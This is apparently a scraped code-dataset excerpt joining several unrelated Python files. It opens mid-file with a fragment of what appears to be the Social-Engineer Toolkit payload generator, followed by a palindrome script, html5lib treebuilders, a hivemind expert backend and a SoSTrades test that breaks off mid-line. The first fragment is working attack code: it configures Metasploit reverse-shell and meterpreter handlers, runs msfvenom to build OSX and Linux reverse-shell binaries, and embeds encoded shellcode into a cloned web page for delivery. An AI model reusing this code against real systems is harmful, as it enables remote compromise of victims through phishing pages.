Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n") choice9 = raw_input( setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]")) # select default meterpreter reverse tcp if choice9 == "" or choice9 == "1": choice9 = "windows/meterpreter/reverse_tcp" # select reverse https if choice9 == "2": choice9 = "windows/meterpreter/reverse_https" # select reverse http if choice9 == "3": choice9 = "windows/meterpreter/reverse_http" # select all ports if choice9 == "4": choice9 = "windows/meterpreter/reverse_tcp_allports" if choice9 == "5": choice9 = "windows/shell/reverse_tcp" # check the ipaddr if ipaddr == "": # grab ipaddr if not defined ipaddr = check_options("IPADDR=") # break out if not needed if choice9 == "6": break shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]")) if shellcode_port == "": shellcode_port = "443" # here we prep our meta config to listen on all # the ports we want - free hugs all around filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a") port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port) if port_check == False: filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port)) filewrite.close() if choice1 != "cmd/multi": if validate_ip(choice2) == False: if choice9 != "windows/meterpreter/reverse_https": if choice9 != "windows/meterpreter/reverse_http": print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https") choice9 == "windows/meterpreter/reverse_https" if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1" # fix port num if "multipyinject" in choice1: portnum = shellcode_port else: portnum = portnum.replace("LPORT=", "") # meterpreter reverse_tcp if choice9 == "windows/meterpreter/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum) # meterpreter reverse_https if choice9 == "windows/meterpreter/reverse_https": shellcode = metasploit_shellcode(choice9, choice2, portnum) # meterpreter reverse_http if choice9 == "windows/meterpreter/reverse_http": shellcode = metasploit_shellcode(choice9, choice2, portnum) # meterpreter tcp allports if choice9 == "windows/meterpreter/reverse_tcp_allports": shellcode = metasploit_shellcode(choice9, choice2, portnum) # windows shell reverse_tcp if choice9 == "windows/shell/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum) if choice1 == "shellcode/pyinject": shellcode_port = portnum.replace("LPORT=", "") if validate_ip(choice2) == True: shellcode = shellcode_replace(choice2, shellcode_port, shellcode) # here we write out the payload and port for later # use in powershell injection payload_options.write(choice9 + " " + portnum + ",") # break out of the loop if we are only using one # payload else keep on if choice1 == "shellcode/pyinject": break multipyinject_payload += shellcode + "," if choice1 != "cmd/multi": # get rid of tail comma if multipyinject_payload.endswith(","): multipyinject_payload = multipyinject_payload[:-1] # if we have multiple payloads, use multi injector if choice1 == "shellcode/multipyinject": # we first need to encrypt the payload via AES 256 print_status("Encrypting the shellcode via AES 256 encryption..") secret = os.urandom(32) shellcode = encryptAES(secret, multipyinject_payload) print_status("Dynamic cipher key created and embedded into payload.") filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w") filewrite.write(shellcode) filewrite.close() if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject": # close the pyinjector file for ports and payload payload_options.close() # here we are going to encode the payload via base64 fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r") data = fileopen.read() if payloadgen != "solo": # base64 1 data = str(data) data = base64.b64encode(b'data') # encode it again for the fun 2 data = base64.b64encode(b'data') # again 3 data = base64.b64encode(b'data') # again 4 data = base64.b64encode(b'data') # again 5 data = base64.b64encode(b'data') # again 6 data = base64.b64encode(b'data') # again 7 data = base64.b64encode(b'data') # again 8 data = base64.b64encode(b'data') # 9 data = base64.b64encode(b'data') # 10 data = base64.b64encode(b'data') # last one data = base64.b64encode(b'data') # filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w") filewrite.write(str(data)) filewrite.close() if choice1 == "shellcode/alphanum": print_status("Prepping shellcodeexec for delivery..") if choice1 == "shellcode/pyinject": print_status("Prepping pyInjector for delivery..") # prepping multi pyinjector if choice1 == "shellcode/multipyinject": print_status("Prepping Multi-pyInjector for delivery..") # here we obfuscate the binary a little bit random_string = generate_random_string(3, 3).upper() if choice1 == "shellcode/alphanum": fileopen = open("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb").read() if choice1 == "shellcode/pyinject": fileopen = open("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb").read() if choice1 == "shellcode/multipyinject": fileopen = open("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb").read() # write out the payload if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject": filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(fileopen) filewrite.close() subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() # we need to read in the old index.html file because its # already generated, need to present the alphanum to it if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r") alpha_shellcode = fileopen2.read().rstrip() data = fileopen.read() data = data.replace( 'param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode)) if choice1 == "shellcode/multipyinject": secret = base64.b64encode(b'secret') data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret)) filewrite.write(str(data)) # close file filewrite.close() # rename file if choice1 == "shellcode/alphanum": print_status("Prepping website for alphanumeric injection..") if choice1 == "shellcode/pyinject": print_status("Prepping website for pyInjector shellcode injection..") print_status("Base64 encoding shellcode and prepping for delivery..") subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1" choice3 = "1" # UPDATE THE SET CONFIG OPTIONS update_options("PORT=1") # here we specify the payload name thats stored later on choice1 = choice9 # write out the payload for powershell injection to pick it up if used filewrite = open(userconfigpath + "metasploit.payload", "w") filewrite.write(choice1) filewrite.close() # import if on setshell_counter = 0 powershell = check_config("POWERSHELL_INJECTION=") if powershell.lower() == "on" or powershell.lower() == "yes": if choice1 == "set/reverse_shell" or choice1 == "RATTE": print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.") setshell_counter = 1 if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): if choice1 != "cmd/multi": try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep if os.path.isfile("%s/x86.powershell" % (userconfigpath)): fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r") x86 = fileopen1.read() x86 = "powershell -ec " + x86 # if we specified option cmd/multi which allows us to enter commands in instead and execute them many times if choice1 == "cmd/multi": print_status("This section will allow you to specify your own .txt file which can contain one more multiple commands. In order to execute multiple commands you would enter them in for example: cmd1,cmd2,cmd3,cmd4. In the background the Java Applet will enter in cmd /c 'yourcommands here'. You need to provide a path to the txt file that contains all of your commands or payloads split by commas. If just one, then just use no ,.") filepath = raw_input("\nEnter the path to the file that contains commands: ") while 1: if not os.path.isfile(filepath): filepath = raw_input("[!] File not found.\nEnter the path again and make sure file is there: ") if os.path.isfile(filepath): break x86 = open(filepath, "r").read() print_status("Multi-command payload delivery for Java Applet selected.") print_status("Embedding commands into Java Applet parameters...") print_status("Note that these will be base64-encoded once, regardless of the payload..") fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # encode once, will need to decode later x86 = x86.encode("utf-8") base_encode = base64.b64encode(x86) data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (base_encode)) data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (base_encode)) if choice1 == "cmd/multi": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"') if choice1 != "cmd/multi": # check if we don't want to deploy binaries deploy_binaries = check_config("DEPLOY_BINARIES=") if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"') if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes": data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') filewrite.write(data) filewrite.close() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait() # here we specify the binary to deploy if we are using ones that are # required to drop binaries if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi": fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # check if we don't want to deploy binaries data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') filewrite.write(data) filewrite.close() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # specify attack vector as SET interactive shell if choice1 == "set/reverse_shell": attack_vector = "set_payload" # if we have the java attack, multiattack java, and the set interactive # shell if attack_vector == "java" or multiattack_java == "on": if attack_vector != "set_payload": # pull in the ports from config port1 = check_config("OSX_REVERSE_PORT=") # if we are using the multiattack, there will be port # conflicts, need to scoot it to 8082 if attack_vector == "multiattack": port1 = "8082" # deploy nix and linux binaries if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on": # if we are using a custom linux/osx payload if check_config("CUSTOM_LINUX_OSX_PAYLOAD=").lower() == "on": osx_path = raw_input( "Enter the path for the custom OSX payload (blank for nothing): ") lin_path = raw_input( "Enter the path for the custom Linux payload (blank for nothing): ") print_status( "Copying custom payloads into proper directory structure.") # if we didn't specify blank if osx_path != "": while 1: if not os.path.isfile(osx_path): print_error( "File not found, enter the path again.") osx_path = raw_input( "Enter the path for the custom OSX payload (blank for nothing): ") if os.path.isfile(osx_path): break if osx_path != "": # copy the payload shutil.copyfile(osx_path, userconfigpath + "mac.bin") # if linux payload if lin_path != "": while 1: if not os.path.isfile(lin_path): print_error( "File not found, enter the path again.") lin_path = raw_input( "Enter the path for the custom Linux payload (blank for nothing): ") if os.path.isfile(lin_path): break if lin_path != "": # copy the payload shutil.copyfile(lin_path, userconfigpath + "nix.bin") else: port2 = check_config("LINUX_REVERSE_PORT=") osxpayload = check_config("OSX_PAYLOAD_DELIVERY=") linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=") print_status("Generating OSX payloads through Metasploit...") subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print_status("Generating Linux payloads through Metasploit...") subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() if multiattack_java == "on": multiattack.write("OSX=" + str(port1) + "\n") multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload)) multiattack.write("LINUX=" + str(port2) + "\n") multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload)) osxcheck = check_options("MAC.BIN=") linuxcheck = check_options("NIX.BIN=") shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck)) shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck)) # try block here try: # if they want a listener, start here if os.path.isfile("%s/meta_config" % (userconfigpath)): # if its already created filewrite = open("%s/meta_config" % (userconfigpath), "a") if not os.path.isfile("%s/meta_config" % (userconfigpath)): # if we need to create it filewrite = open("%s/meta_config" % (userconfigpath), "w") # if there isn't a multiattack metasploit, setup handler if not os.path.isfile("%s/multi_meta" % (userconfigpath)): port_check = check_ports("%s/meta_config" % (userconfigpath), choice3) if port_check == False: filewrite.write("use exploit/multi/handler\n") filewrite.write("set PAYLOAD " + choice1 + "\n") filewrite.write("set LHOST " + ipaddr + "\n") if flag == 0: filewrite.write("set LPORT " + choice3 + "\n") filewrite.write("set EnableStageEncoding %s\n" % (stage_encoding)) filewrite.write("set ExitOnSession false\n") if auto_migrate == "ON": filewrite.write( "set AutoRunScript post/windows/manage/smart_migrate\n") # config option for using multiscript meterpreter if meterpreter_multi == "ON": multiwrite = open(userconfigpath + "multi_meter.file", "w") multiwrite.write(meterpreter_multi_command) filewrite.write( "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("exploit -j\r\n\r\n") # if we want to embed UNC paths for hashes if unc_embed == "ON": filewrite.write("use server/capture/smb\n") filewrite.write("exploit -j\r\n\r\n") # if only doing payloadgen then close the stuff up if payloadgen == "solo": filewrite.close() # Define linux and OSX payloads if payloadgen == "regular": if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on": filewrite.write("use exploit/multi/handler\n") filewrite.write( "set PAYLOAD osx/x86/shell_reverse_tcp" + "\n") filewrite.write("set LHOST " + choice2 + "\n") filewrite.write("set LPORT " + port1 + "\n") filewrite.write("set ExitOnSession false\n") filewrite.write("exploit -j\r\n\r\n") filewrite.write("use exploit/multi/handler\n") filewrite.write( "set PAYLOAD linux/x86/shell/reverse_tcp" + "\n") filewrite.write("set LHOST " + choice2 + "\n") filewrite.write("set LPORT " + port2 + "\n") if linux_meterpreter_multi == "ON": multiwrite = open( userconfigpath + "lin_multi_meter.file", "w") multiwrite.write(linux_meterpreter_multi_command) filewrite.write( "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("set ExitOnSession false\n") filewrite.write("exploit -j\r\n\r\n") filewrite.close() except Exception as e: log(e) print_error("ERROR:Something went wrong:") print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC) # Catch all errors except KeyboardInterrupt: print_warning("Keyboard Interrupt Detected, exiting Payload Gen") # finish closing up the remenant files if attack_vector == "multiattack": multiattack.close() if os.path.isfile("%s/fileformat.file" % (userconfigpath)): filewrite = open("%s/payload.options" % (userconfigpath), "w") filewrite.write(choice1 + " " + ipaddr + " " + choice3) filewrite.close() if choice1 == "set/reverse_shell": if os.path.isfile(userconfigpath + "meta_config"): os.remove(userconfigpath + "meta_config")
50.779319
459
0.520686
1bb7ad7d12ca47f72c3d6e1be3d308044cde6cc1
189
py
Python
text/is_palindrome.py
mouckatron/Martyr2MegaProjectList
96cea1ea409a50626a2cb91d750f99e9bdf95464
[ "MIT" ]
null
null
null
text/is_palindrome.py
mouckatron/Martyr2MegaProjectList
96cea1ea409a50626a2cb91d750f99e9bdf95464
[ "MIT" ]
null
null
null
text/is_palindrome.py
mouckatron/Martyr2MegaProjectList
96cea1ea409a50626a2cb91d750f99e9bdf95464
[ "MIT" ]
null
null
null
#! /usr/bin/python2.7 import os import sys data = sys.stdin.read().strip() if data == data[::-1]: sys.exit(0) # 0 is true or no failure else: sys.exit(1) # 1 is false or failure
15.75
41
0.624339
e23288474fc6445e48a0be0e2a554416af5431b6
3,406
py
Python
env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
lindamar/ecclesi
cad07fc78daf6facd1b74cc1cb1872aaf4771fa2
[ "MIT" ]
674
2015-11-06T04:22:47.000Z
2022-02-26T17:31:43.000Z
env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
lindamar/ecclesi
cad07fc78daf6facd1b74cc1cb1872aaf4771fa2
[ "MIT" ]
3,243
2017-02-07T15:30:01.000Z
2022-03-31T16:42:19.000Z
env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
lindamar/ecclesi
cad07fc78daf6facd1b74cc1cb1872aaf4771fa2
[ "MIT" ]
210
2017-09-01T00:10:08.000Z
2022-03-19T18:05:12.000Z
"""A collection of modules for building different kinds of tree from HTML documents. To create a treebuilder for a new type of tree, you need to do implement several things: 1) A set of classes for various types of elements: Document, Doctype, Comment, Element. These must implement the interface of _base.treebuilders.Node (although comment nodes have a different signature for their constructor, see treebuilders.etree.Comment) Textual content may also be implemented as another node type, or not, as your tree implementation requires. 2) A treebuilder object (called TreeBuilder by convention) that inherits from treebuilders._base.TreeBuilder. This has 4 required attributes: documentClass - the class to use for the bottommost node of a document elementClass - the class to use for HTML Elements commentClass - the class to use for comments doctypeClass - the class to use for doctypes It also has one required method: getDocument - Returns the root node of the complete document tree 3) If you wish to run the unit tests, you must also create a testSerializer method on your treebuilder which accepts a node and returns a string containing Node and its children serialized according to the format used in the unittests """ from __future__ import absolute_import, division, unicode_literals from .._utils import default_etree treeBuilderCache = {} def getTreeBuilder(treeType, implementation=None, **kwargs): """Get a TreeBuilder class for various types of tree with built-in support treeType - the name of the tree type required (case-insensitive). Supported values are: "dom" - A generic builder for DOM implementations, defaulting to a xml.dom.minidom based implementation. "etree" - A generic builder for tree implementations exposing an ElementTree-like interface, defaulting to xml.etree.cElementTree if available and xml.etree.ElementTree if not. "lxml" - A etree-based builder for lxml.etree, handling limitations of lxml's implementation. implementation - (Currently applies to the "etree" and "dom" tree types). A module implementing the tree type e.g. xml.etree.ElementTree or xml.etree.cElementTree.""" treeType = treeType.lower() if treeType not in treeBuilderCache: if treeType == "dom": from . import dom # Come up with a sane default (pref. from the stdlib) if implementation is None: from xml.dom import minidom implementation = minidom # NEVER cache here, caching is done in the dom submodule return dom.getDomModule(implementation, **kwargs).TreeBuilder elif treeType == "lxml": from . import etree_lxml treeBuilderCache[treeType] = etree_lxml.TreeBuilder elif treeType == "etree": from . import etree if implementation is None: implementation = default_etree # NEVER cache here, caching is done in the etree submodule return etree.getETreeModule(implementation, **kwargs).TreeBuilder else: raise ValueError("""Unrecognised treebuilder "%s" """ % treeType) return treeBuilderCache.get(treeType)
44.233766
79
0.685555
a67dba6522c8a61453b32bc3ca21f85bc77aee93
10,764
py
Python
hivemind/server/expert_backend.py
Vsevolod-pl/hivemind
0300cfd91adeb14d91d9659a98221628f9b775b9
[ "MIT" ]
11
2021-06-21T19:56:01.000Z
2021-12-22T09:06:09.000Z
hivemind/server/expert_backend.py
Vsevolod-pl/hivemind
0300cfd91adeb14d91d9659a98221628f9b775b9
[ "MIT" ]
null
null
null
hivemind/server/expert_backend.py
Vsevolod-pl/hivemind
0300cfd91adeb14d91d9659a98221628f9b775b9
[ "MIT" ]
null
null
null
from typing import Dict, Sequence, Any, Tuple, Union, Callable import torch from torch import nn from hivemind.server.task_pool import TaskPool from hivemind.utils import BatchTensorDescriptor, DUMMY_BATCH_SIZE from hivemind.utils.logging import get_logger from hivemind.utils.nested import nested_flatten, nested_pack, nested_compare, nested_map logger = get_logger(__name__) class ExpertBackend: """ ExpertBackend is a wrapper around torch module that allows it to run tasks asynchronously with Runtime By default, ExpertBackend handles three types of requests: - forward - receive inputs and compute outputs. Concurrent requests will be batched for better GPU utilization. - backward - receive gradients w.r.t. outputs, compute gradients w.r.t. inputs and **update expert**. Also batched. - get_info - return expert metadata. Not batched. :param expert: nn.Module to be wrapped into a backend. Arbitrary pytorch module with a few limitations: - Experts must always receive the same set of args and kwargs and produce output tensors of same type - All args, kwargs and outputs must be **tensors** where 0-th dimension represents to batch size - We recommend using experts that are ~invariant to the order in which they process batches - Using randomness (e.g. Dropout) leads to different samples at forward and backward. If you want consistency, you should explicitly register these random variables as model inputs or outputs. See hivemind.utils.custom_layers.DeterministicDropout for an example :param optimizer: torch optimizer to be applied on every backward call :param scheduler: a function to create the learning rate scheduler for the expert :param args_schema: description of positional arguments to expert.forward, list of BatchTensorProto :param kwargs_schema: description of keyword arguments to expert.forward, dict of BatchTensorProto :param outputs_schema: description of outputs from expert.forward, nested structure of BatchTensorProto :param num_warmup_steps: the number of warmup steps for LR schedule :param num_total_steps: the total number of steps for LR schedule :param clip_grad_norm: maximum gradient norm used for clipping :param kwargs: extra parameters to be forwarded into TaskPool.__init__ """ def __init__(self, name: str, expert: nn.Module, optimizer: torch.optim.Optimizer, *, scheduler: Callable = None, args_schema: Tuple[BatchTensorDescriptor, ...] = None, kwargs_schema: Dict[str, BatchTensorDescriptor] = None, outputs_schema: Union[BatchTensorDescriptor, Tuple[BatchTensorDescriptor, ...]] = None, num_warmup_steps: int = None, num_total_steps: int = None, clip_grad_norm: float = None, **kwargs): super().__init__() self.expert, self.optimizer, self.name = expert, optimizer, name if scheduler is None: self.scheduler = None else: assert optimizer is not None and num_warmup_steps is not None and num_total_steps is not None self.scheduler = scheduler(self.optimizer, num_warmup_steps, num_total_steps) self.clip_grad_norm = clip_grad_norm self.args_schema = args_schema = tuple(args_schema or ()) self.kwargs_schema = kwargs_schema = dict(kwargs_schema or {}) assert args_schema or kwargs_schema, "expert must receive at least one positional or keyword input." \ " Did you forget to provide args_schema/kwargs_schema?" if outputs_schema is None: # run expert once to get outputs schema dummy_args = tuple(sample.make_empty(DUMMY_BATCH_SIZE) for sample in args_schema) dummy_kwargs = {key: sample.make_empty(DUMMY_BATCH_SIZE) for key, sample in kwargs_schema.items()} dummy_outputs = self.expert(*dummy_args, **dummy_kwargs) outputs_schema = nested_map(BatchTensorDescriptor.from_tensor, dummy_outputs) self.forward_schema = (self.args_schema, self.kwargs_schema) # inputs for forward self.outputs_schema = outputs_schema # outputs from forward self.backward_schema = (self.forward_schema, self.outputs_schema) # inputs to backward self.grad_inputs_schema = self.forward_schema # outputs from backward self.forward_pool = TaskPool(self.forward, name=f'{self.name}_forward', **kwargs) self.backward_pool = TaskPool(self.backward, name=f'{self.name}_backward', **kwargs) self.update_count = 0 self.examples_processed = 0 def forward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]: """ Apply forward pass to an aggregated batch of requests. Used by Runtime, do not call this manually; To submit a request for asynchronous processing, please use ``ExpertBackend.forward_pool.submit_task``. Subclassing: This method receives a sequence of torch tensors following ``nested_flatten(self.forward_schema)``; It should return gradients w.r.t. inputs that follow ``nested_flatten(self.outputs_schema)``; .. todo we handle layer states (e.g. batchnorm stats) incorrectly, updating them twice. .. For now, either register all buffers as outputs or avoid stateful experts """ args, kwargs = nested_pack(inputs, structure=self.forward_schema) if args[0].shape[0] == 0: raise RuntimeError("Batch should contain more than 0 samples") with torch.no_grad(): outputs = self.expert(*args, **kwargs) # Note: TaskPool requires function to accept and return a flat tuple of values, we pack/unpack it on client side return tuple(nested_flatten(outputs)) def backward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]: """ Apply backward pass to an aggregated batch of requests. Used by Runtime, do not call this manually To submit a request for asynchronous processing, please use ``ExpertBackend.backward_pool.submit_task``. Subclassing: This method receives a sequence of torch tensors following ``nested_flatten(self.backward_schema)``; It should return gradients w.r.t. inputs that follow ``nested_flatten(self.forward_schema)``; Runtime doesn't guarantee that backward will be performed in the same order and for the same data as forward, so we recommend stateless backward pass that re-runs expert forward pass inside backward. .. todo correct state handling (see forward) Please make sure to call ``ExpertBackend.apply_gradients`` here, otherwise the expert will not train """ (args, kwargs), grad_outputs = nested_pack(inputs, structure=self.backward_schema) with torch.enable_grad(): args = [tensor.detach().requires_grad_(True) if tensor.dtype in (torch.half, torch.float, torch.double) else tensor.detach() for tensor in args] kwargs = {input_key: (tensor.detach().requires_grad_(True) if tensor.is_floating_point() else tensor.detach()) for input_key, tensor in kwargs.items()} batch_size = args[0].size(0) outputs = self.expert(*args, **kwargs) assert nested_compare(outputs, grad_outputs), "outputs and grad_outputs must have the same structure" outputs_flat = tuple(nested_flatten(outputs)) grad_outputs_flat = tuple(map( lambda grad, out: grad.to(device=out.device, dtype=out.dtype, non_blocking=True), nested_flatten(grad_outputs), outputs_flat)) torch.autograd.backward(outputs_flat, grad_tensors=grad_outputs_flat, create_graph=False, retain_graph=False) self.apply_gradients(batch_size) return tuple(x.grad if isinstance(x.grad, torch.Tensor) else torch.zeros_like(x) for x in nested_flatten((args, kwargs))) def apply_gradients(self, batch_size) -> None: """ Train the expert for one step. This method is called by ``ExpertBackend.backward`` after computing gradients. """ if self.clip_grad_norm is not None: torch.nn.utils.clip_grad_norm_(self.expert.parameters(), self.clip_grad_norm) self.optimizer.step() self.optimizer.zero_grad() if self.scheduler is not None: self.scheduler.step() self.update_count += 1 self.examples_processed += batch_size def get_stats(self) -> Dict: """ Return current expert training statistics (number of updates, number of processed examples after last optimizer step) """ return { 'updates': self.update_count, 'examples_processed': self.examples_processed } def get_full_state(self) -> Dict: """ Return the current state of the expert (including batch processing statistics) """ full_state = { 'stats': self.get_stats(), 'model': self.expert.state_dict(), 'optimizer': self.optimizer.state_dict(), 'scheduler': {} if self.scheduler is None else self.scheduler.state_dict() } return full_state def load_full_state(self, state_dict: Dict): if 'stats' in state_dict: self.update_count = state_dict['stats']['updates'] self.examples_processed = state_dict['stats']['examples_processed'] else: logger.warning(f'Batch processing stats missing for expert {self.name}') self.expert.load_state_dict(state_dict['model']) if 'optimizer' in state_dict: self.optimizer.load_state_dict(state_dict['optimizer']) else: logger.warning(f'Optimizer state missing for expert {self.name}') if self.scheduler is not None and 'scheduler' in state_dict: self.scheduler.load_state_dict(state_dict['scheduler']) else: logger.warning(f'Learning rate scheduler state missing for expert {self.name}') def get_info(self) -> Dict[str, Any]: """ Get expert parameters and stats. Used by RemoteExpert to check shapes and for DMoE orchestration. """ return dict(forward_schema=self.forward_schema, outputs_schema=self.outputs_schema, keyword_names=tuple(self.kwargs_schema.keys())) def get_pools(self) -> Sequence[TaskPool]: """ return all pools that should be processed by ``Runtime`` """ return self.forward_pool, self.backward_pool
50.065116
125
0.678558
9d6dcaec00f412707cca21822d9dcd4cf71710f3
40,498
py
Python
sos_trades_core/tests/l0_test_36_simple_multi_scenario.py
os-climate/sostrades-core
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
[ "Apache-2.0" ]
8
2022-01-10T14:44:28.000Z
2022-03-31T08:57:14.000Z
sos_trades_core/tests/l0_test_36_simple_multi_scenario.py
os-climate/sostrades-core
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
[ "Apache-2.0" ]
null
null
null
sos_trades_core/tests/l0_test_36_simple_multi_scenario.py
os-climate/sostrades-core
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
[ "Apache-2.0" ]
1
2022-02-21T14:51:45.000Z
2022-02-21T14:51:45.000Z
''' Copyright 2022 Airbus SAS Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' ''' mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8 ''' import unittest from time import sleep from shutil import rmtree from pathlib import Path from os.path import join import pandas as pd import numpy as np from sos_trades_core.execution_engine.execution_engine import ExecutionEngine from sos_trades_core.execution_engine.sos_simple_multi_scenario import SoSSimpleMultiScenario from sos_trades_core.execution_engine.scatter_data import SoSScatterData from sos_trades_core.execution_engine.sos_discipline_scatter import SoSDisciplineScatter from tempfile import gettempdir from sos_trades_core.tools.rw.load_dump_dm_data import DirectLoadDump from sos_trades_core.study_manager.base_study_manager import BaseStudyManager class TestSimpleMultiScenario(unittest.TestCase): """ SoSSimpleMultiScenario test class """ def setUp(self): ''' Initialize third data needed for testing ''' self.dirs_to_del = [] self.namespace = 'MyCase' self.study_name = f'{self.namespace}' self.repo = 'sos_trades_core.sos_processes.test' self.base_path = 'sos_trades_core.sos_wrapping.test_discs' self.exec_eng = ExecutionEngine(self.namespace) self.factory = self.exec_eng.factory self.root_dir = gettempdir() def tearDown(self): for dir_to_del in self.dirs_to_del: sleep(0.5) if Path(dir_to_del).is_dir(): rmtree(dir_to_del) sleep(0.5) def test_01_multi_scenario_of_scatter(self): # scatter build map ac_map = {'input_name': 'name_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'ac_name', 'scatter_ns': 'ns_ac', 'gather_ns': 'ns_scenario', 'ns_to_update': ['ns_data_ac']} self.exec_eng.smaps_manager.add_build_map('name_list', ac_map) # scenario build map scenario_map = {'input_name': 'scenario_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'scenario_name', 'scatter_ns': 'ns_scenario', 'gather_ns': 'ns_scatter_scenario', 'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']} self.exec_eng.smaps_manager.add_build_map( 'scenario_list', scenario_map) # shared namespace self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase') self.exec_eng.ns_manager.add_ns( 'ns_scatter_scenario', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_disc3', 'MyCase.multi_scenarios.Disc3') self.exec_eng.ns_manager.add_ns( 'ns_out_disc3', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_data_ac', 'MyCase') # instantiate factory # get instantiator from Discipline class builder_list = self.factory.get_builder_from_process(repo=self.repo, mod_id='test_disc1_scenario') scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list( 